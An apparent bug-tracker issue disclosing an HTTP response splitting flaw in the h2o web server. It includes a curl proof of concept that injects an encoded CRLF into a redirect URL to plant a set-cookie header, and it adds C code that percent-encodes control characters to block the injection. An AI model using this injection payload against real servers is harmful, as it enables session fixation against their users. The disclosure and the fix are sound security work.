
HTTP response splitting #682

Closed
@nanorc

Description

Hi,

I found out that I can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:

$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8

the h2o config:

hosts:
    "fooexample.com":
        listen:
            port: 80
        paths:
            "/":
                redirect:
                    status: 301
                    url: https://fooexample.com/
    "fooexample.com":
        listen:
            port: 443
            ssl:
                certificate-file: /path/to/fooexample.crt
                key-file:         /path/to/fooexample.key

This issue could lead to a session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie.
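A hardened way to build the Location value, added here as an example and not h2o's own code. It assumes the redirect handler appends the already percent-decoded request path to the configured URL (which is how the raw CRLF reaches the header in the report above); every control character, including CR and LF, is percent-encoded before the header is written, and a final check refuses any value that still contains a line terminator.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Returns false if a header value contains a byte that would terminate the
 * header line (CR or LF); such a value must never be emitted. */
bool header_value_is_safe(const char *value)
{
    for (const unsigned char *p = (const unsigned char *)value; *p != '\0'; ++p) {
        if (*p == '\r' || *p == '\n')
            return false;
    }
    return true;
}

/* Build a Location header value from the redirect base and the decoded request
 * path. Every byte that is a control character, a space, a '%' or outside
 * printable ASCII is percent-encoded, so CRLF can never reach the wire.
 * Returns the number of bytes written (excluding NUL), or -1 if out is too small. */
int build_location(const char *base, const char *path, char *out, size_t outlen)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t baselen = strlen(base), n = baselen;
    if (baselen + 1 > outlen) return -1;
    memcpy(out, base, baselen);
    for (const unsigned char *p = (const unsigned char *)path; *p != '\0'; ++p) {
        if (*p <= 0x20 || *p >= 0x7f || *p == '%') {
            if (n + 3 + 1 > outlen) return -1;
            out[n++] = '%';
            out[n++] = hex[*p >> 4];
            out[n++] = hex[*p & 0x0f];
        } else {
            if (n + 1 + 1 > outlen) return -1;
            out[n++] = (char)*p;
        }
    }
    out[n] = '\0';
    return (int)n;
}

int main(void)
{
    /* Constructed input: the request path from the report, after percent-decoding. */
    const char *decoded = "/en/\r\nset-cookie:test=test";
    char loc[256];
    if (build_location("https://fooexample.com", decoded, loc, sizeof loc) < 0) return 1;
    printf("Location: %s\n", loc); /* prints https://fooexample.com/en/%0D%0Aset-cookie:test=test */
    return header_value_is_safe(loc) ? 0 : 1;
}
```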
